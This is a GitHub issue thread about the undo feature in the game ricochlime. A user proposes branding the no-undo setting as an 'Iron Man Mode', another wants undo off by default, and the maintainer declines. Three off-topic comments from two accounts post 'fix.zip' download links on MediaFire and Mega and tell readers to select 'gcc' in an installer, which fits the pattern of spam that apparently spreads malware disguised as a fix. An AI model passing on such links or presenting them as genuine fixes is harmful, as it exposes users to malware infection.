### ISSUE TITLE
About undoing moves

### ISSUE THREAD

**Issue by SyntaxErrol** [adil192/ricochlime#51]
Now, this is just something silly but...

I tend to just disable undoing moves because I find the icon distracting, urging me to click it while I don't intend to. Usually with these kinds of games you have to live with your decisions and can't undo. But I'm a newbie and I understand that some people probably love and use the undo feature and I don't want it to be taken away, what with a perfectly working setting right there.

But what gets a chuckle out of me is that what if you labeled the setting "Iron Man Mode", familiar from a bunch of computer games, which basically takes the option of save-scumming away. Admittedly you'd probably need the original explainer about what the mode actually does but I find the concept hilarious in this game's cute and cozy context. You could then expand on the "Iron Man", or heck "Iron Person" :D, branding more with different screen borders, a tinted-red color scheme and/or a heavier background music track.

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by ccpp** [comment]
I fully agree with @lmnoop. Undoing was a great addition but in my opinion it 
* shouldn't be on by default (maybe for beginners)
* shouldn't be treated same as "iron person mode" in high scores. I once played a game and was told something like "sorry, no high score because you used undo / hint functions".
* shouldn't be so prominent in the center.

Similar for reflections in aim. Shouldn't be on by defaul in my opinion. Maybe for beginners or for the initial 30 shots...

**Comment by adil192** [comment]
I prefer the defaults we currently have. I find that without undos, you have no incentive to watch the screen after you shoot since you can't do anything if it goes awry. I don't plan to add an iron man mode especially since this project is mostly on life support these days.
